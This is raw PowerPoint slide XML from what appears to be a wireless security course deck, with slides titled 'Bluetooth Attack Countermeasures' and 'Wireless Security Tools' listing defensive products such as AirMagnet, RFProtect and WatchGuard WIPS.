        <p:grpSpPr>
          <a:xfrm>
            <a:off x="439782" y="1371598"/>
            <a:ext cx="363329" cy="399885"/>
            <a:chOff x="7100185" y="2044623"/>
            <a:chExt cx="363329" cy="363532"/>
          </a:xfrm>
        </p:grpSpPr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913CAEA5-9A29-44E8-8BFB-1E0AF43811A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7100185" y="2044623"/>
              <a:ext cx="363329" cy="363329"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr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2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="135" name="TextBox 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54830464-5B02-4BE3-BEC8-5577BFE7FB31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7126197" y="2072399"/>
              <a:ext cx="311304" cy="3357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b="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Oval 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92C578C3-35AB-4200-A214-87F85D33F505}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439782" y="2221306"/>
            <a:ext cx="363329" cy="399662"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="2857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>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="TextBox 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83ED0B23-5A4F-4C04-AC0E-504A070E479F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465936" y="2255124"/>
            <a:ext cx="3113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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r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B457B85C-3A12-42EA-B420-51A4CAD2B180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="439782" y="3071014"/>
            <a:ext cx="363329" cy="399884"/>
            <a:chOff x="7100185" y="3546683"/>
            <a:chExt cx="363329" cy="363531"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="130" name="Oval 129">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA95E5B0-4B6A-4DF1-AC08-E88B231D6C91}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7100185" y="3546683"/>
              <a:ext cx="363329" cy="363329"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr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2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="131" name="TextBox 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0357A2D1-00E4-4343-8111-D202192CA11E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7126197" y="3574458"/>
              <a:ext cx="311304" cy="3357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b="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>3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6F430E15-D70F-4B74-A94A-158C17B082A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="439782" y="3920728"/>
            <a:ext cx="363329" cy="402222"/>
            <a:chOff x="7100185" y="4297713"/>
            <a:chExt cx="363329" cy="365656"/>
          </a:xfrm>
        </p:grpSpPr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FC4ADB40-1934-440A-8C56-3C8F2EFCB5CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7100185" y="4297713"/>
              <a:ext cx="363329" cy="363329"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr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2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="129" name="TextBox 92">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B58F54D-2BA1-47A8-8E12-94AC033F7C8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7126197" y="4327613"/>
              <a:ext cx="311304" cy="3357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b="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a: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451296A2-515B-408C-809F-87D7C9EFF70A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="439782" y="4770432"/>
            <a:ext cx="363329" cy="399662"/>
            <a:chOff x="7100185" y="5048743"/>
            <a:chExt cx="363329" cy="363329"/>
          </a:xfrm>
        </p:grpSpPr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1EF8646F-0E04-4033-8B02-E529E8F67448}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7100185" y="5048743"/>
              <a:ext cx="363329" cy="363329"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr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2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="127" name="TextBox 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FA803DA-6EBB-48BF-9838-231188E7BCCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7126197" y="5073018"/>
              <a:ext cx="311304" cy="3357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b="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p: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A260FF75-F83E-4D5B-A785-B38CB8C52225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="439782" y="5620133"/>
            <a:ext cx="363329" cy="399885"/>
            <a:chOff x="7100185" y="5799771"/>
            <a:chExt cx="363329" cy="363532"/>
          </a:xfrm>
        </p:grpSpPr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900B9255-B346-4B49-90A4-2A7A8EF04F01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7100185" y="5799771"/>
              <a:ext cx="363329" cy="363329"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr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2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="125" name="TextBox 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C5F12D6-FA47-4F9A-B364-B15DE7F73075}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7126197" y="5827547"/>
              <a:ext cx="311304" cy="3357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b="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>6</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3190EAE0-5474-432E-B9A5-1FAF02E90F37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="168673" y="124826"/>
            <a:ext cx="6827517" cy="1110344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="1828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88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Bluetooth Attack Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337561544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ounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20AEDBF4-1D7A-42DC-8C11-EC97034A0839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="980728"/>
            <a:ext cx="12192001" cy="994628"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E7E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lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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4133BEB-8ECE-4816-98B3-BDDB4DDD5106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141413" y="158750"/>
            <a:ext cx="9909175" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN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Wireless Security Tools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4D38D68D-35EC-4F4A-B3A4-13750899700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417" y="2271054"/>
            <a:ext cx="6396037" cy="4030519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EF3D9B73-42FF-4148-94E4-DBD496EF8298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5449606" y="6035860"/>
            <a:ext cx="1393330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r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>https://www.cisco.com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683708F8-8B6E-4B33-B785-698FF1394C2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8638531" y="2423012"/>
            <a:ext cx="2758704" cy="52322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600" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AirMagnet WiFi Analyzer PRO </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.netally.com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B4867F9E-D839-4975-B7CF-A53F7ED5AE17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8638531" y="3258178"/>
            <a:ext cx="2356094" cy="52322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600" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RFProtect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.arubanetworks.com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23406584-DDEE-4845-93B5-BB90D4E7E880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8638531" y="4093345"/>
            <a:ext cx="2151486" cy="52322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dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WatchGuard WIPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.watchguard.com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CC190B6F-5202-44E1-8ABD-A7539F2CD174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8638531" y="4928512"/>
            <a:ext cx="2622699" cy="523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dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AirMagnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Planner</a:t>
            </a:r>
            <a:b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rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.netally.com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53B38461-EF8C-4280-B1AA-F8CFFCD553CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8638531" y="5763678"/>
            <a:ext cx="2826640" cy="523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Extreme </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1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AirDefense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 </a:t>
            </a:r>
            <a:b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</a:b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https://www.extremenetworks.com</a:t>
            </a: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0F1192CA-AFD1-4E14-8D34-3B0A13B5F338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8020853" y="4951228"/>
            <a:ext cx="513547" cy="51368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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG" dirty="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8B32AB03-828F-434F-8556-E9D72B7EC477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8020853" y="5799966"/>
            <a:ext cx="513547" cy="51368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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG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C88F185D-E07B-4367-9C92-42D7BDAF9BC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8020853" y="4115285"/>
            <a:ext cx="513547" cy="51368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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG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1D2D71B0-8947-416A-A5CA-80E055242FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8020853" y="2446286"/>
            <a:ext cx="513547" cy="51368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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG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B0ABD51D-76CE-4173-B881-0C88BC65E44C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8020853" y="3290692"/>
            <a:ext cx="513547" cy="51368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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG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1" name="Freeform 221">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A0D87FF-D604-4A22-A09C-0965D4DB4580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8158927" y="2574094"/>
            <a:ext cx="249200" cy="245306"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 68881 w 59"/>
              <a:gd name="T1" fmla="*/ 58628 h 58"/>
              <a:gd name="T2" fmla="*/ 58549 w 59"/>
              <a:gd name="T3" fmla="*/ 65525 h 58"/>
              <a:gd name="T4" fmla="*/ 10332 w 59"/>
              <a:gd name="T5" fmla="*/ 65525 h 58"/>
              <a:gd name="T6" fmla="*/ 0 w 59"/>
              <a:gd name="T7" fmla="*/ 58628 h 58"/>
              <a:gd name="T8" fmla="*/ 0 w 59"/>
              <a:gd name="T9" fmla="*/ 6897 h 58"/>
              <a:gd name="T10" fmla="*/ 10332 w 59"/>
              <a:gd name="T11" fmla="*/ 0 h 58"/>
              <a:gd name="T12" fmla="*/ 58549 w 59"/>
              <a:gd name="T13" fmla="*/ 0 h 58"/>
              <a:gd name="T14" fmla="*/ 68881 w 59"/>
              <a:gd name="T15" fmla="*/ 6897 h 58"/>
              <a:gd name="T16" fmla="*/ 68881 w 59"/>
              <a:gd name="T17" fmla="*/ 58628 h 58"/>
              <a:gd name="T18" fmla="*/ 203200 w 59"/>
              <a:gd name="T19" fmla="*/ 106910 h 58"/>
              <a:gd name="T20" fmla="*/ 103322 w 59"/>
              <a:gd name="T21" fmla="*/ 200025 h 58"/>
              <a:gd name="T22" fmla="*/ 0 w 59"/>
              <a:gd name="T23" fmla="*/ 106910 h 58"/>
              <a:gd name="T24" fmla="*/ 0 w 59"/>
              <a:gd name="T25" fmla="*/ 89666 h 58"/>
              <a:gd name="T26" fmla="*/ 10332 w 59"/>
              <a:gd name="T27" fmla="*/ 82769 h 58"/>
              <a:gd name="T28" fmla="*/ 58549 w 59"/>
              <a:gd name="T29" fmla="*/ 82769 h 58"/>
              <a:gd name="T30" fmla="*/ 68881 w 59"/>
              <a:gd name="T31" fmla="*/ 89666 h 58"/>
              <a:gd name="T32" fmla="*/ 68881 w 59"/>
              <a:gd name="T33" fmla="*/ 106910 h 58"/>
              <a:gd name="T34" fmla="*/ 103322 w 59"/>
              <a:gd name="T35" fmla="*/ 131051 h 58"/>
              <a:gd name="T36" fmla="*/ 134319 w 59"/>
              <a:gd name="T37" fmla="*/ 106910 h 58"/>
              <a:gd name="T38" fmla="*/ 134319 w 59"/>
              <a:gd name="T39" fmla="*/ 89666 h 58"/>
              <a:gd name="T40" fmla="*/ 144651 w 59"/>
              <a:gd name="T41" fmla="*/ 82769 h 58"/>
              <a:gd name="T42" fmla="*/ 192868 w 59"/>
              <a:gd name="T43" fmla="*/ 82769 h 58"/>
              <a:gd name="T44" fmla="*/ 203200 w 59"/>
              <a:gd name="T45" fmla="*/ 89666 h 58"/>
              <a:gd name="T46" fmla="*/ 203200 w 59"/>
              <a:gd name="T47" fmla="*/ 106910 h 58"/>
              <a:gd name="T48" fmla="*/ 203200 w 59"/>
              <a:gd name="T49" fmla="*/ 58628 h 58"/>
              <a:gd name="T50" fmla="*/ 192868 w 59"/>
              <a:gd name="T51" fmla="*/ 65525 h 58"/>
              <a:gd name="T52" fmla="*/ 144651 w 59"/>
              <a:gd name="T53" fmla="*/ 65525 h 58"/>
              <a:gd name="T54" fmla="*/ 134319 w 59"/>
              <a:gd name="T55" fmla="*/ 58628 h 58"/>
              <a:gd name="T56" fmla="*/ 134319 w 59"/>
              <a:gd name="T57" fmla="*/ 6897 h 58"/>
              <a:gd name="T58" fmla="*/ 144651 w 59"/>
              <a:gd name="T59" fmla="*/ 0 h 58"/>
              <a:gd name="T60" fmla="*/ 192868 w 59"/>
              <a:gd name="T61" fmla="*/ 0 h 58"/>
              <a:gd name="T62" fmla="*/ 203200 w 59"/>
              <a:gd name="T63" fmla="*/ 6897 h 58"/>
              <a:gd name="T64" fmla="*/ 203200 w 59"/>
              <a:gd name="T65" fmla="*/ 58628 h 58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9" h="58">
                <a:moveTo>
                  <a:pt x="20" y="17"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="18"/>
                  <a:pt x="19" y="19"/>
                  <a:pt x="17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2" y="19"/>
                  <a:pt x="0" y="18"/>
                  <a:pt x="0" y="1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9" y="0"/>
                  <a:pt x="20" y="1"/>
                  <a:pt x="20" y="2"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20" y="17"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="59" y="31"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="47"/>
                  <a:pt x="46" y="58"/>
                  <a:pt x="30" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13" y="58"/>
                  <a:pt x="0" y="47"/>
                  <a:pt x="0" y="31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5"/>
                  <a:pt x="2" y="24"/>
                  <a:pt x="3" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17" y="24"/>
                  <a:pt x="17" y="24"/>
                  <a:pt x="17" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="24"/>
                  <a:pt x="20" y="25"/>
                  <a:pt x="20" y="26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8"/>
                  <a:pt x="28" y="38"/>
                  <a:pt x="30" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="38"/>
                  <a:pt x="39" y="38"/>
                  <a:pt x="39" y="31"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="26"/>
                  <a:pt x="39" y="26"/>
                  <a:pt x="39" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="25"/>
                  <a:pt x="40" y="24"/>
                  <a:pt x="42" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56" y="24"/>
                  <a:pt x="56" y="24"/>
                  <a:pt x="56" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="24"/>
                  <a:pt x="59" y="25"/>
                  <a:pt x="59" y="26"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="59" y="31"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="59" y="17"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="18"/>
                  <a:pt x="58" y="19"/>
                  <a:pt x="56" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42" y="19"/>
                  <a:pt x="42" y="19"/>
                  <a:pt x="42" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="19"/>
                  <a:pt x="39" y="18"/>
                  <a:pt x="39" y="17"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="2"/>
                  <a:pt x="39" y="2"/>
                  <a:pt x="39" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="1"/>
                  <a:pt x="40" y="0"/>
                  <a:pt x="42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8" y="0"/>
                  <a:pt x="59" y="1"/>
                  <a:pt x="59" y="2"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="59" y="1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32" name="Freeform 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B814A852-B5A7-43FE-8DAA-AB8F09D2F4C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
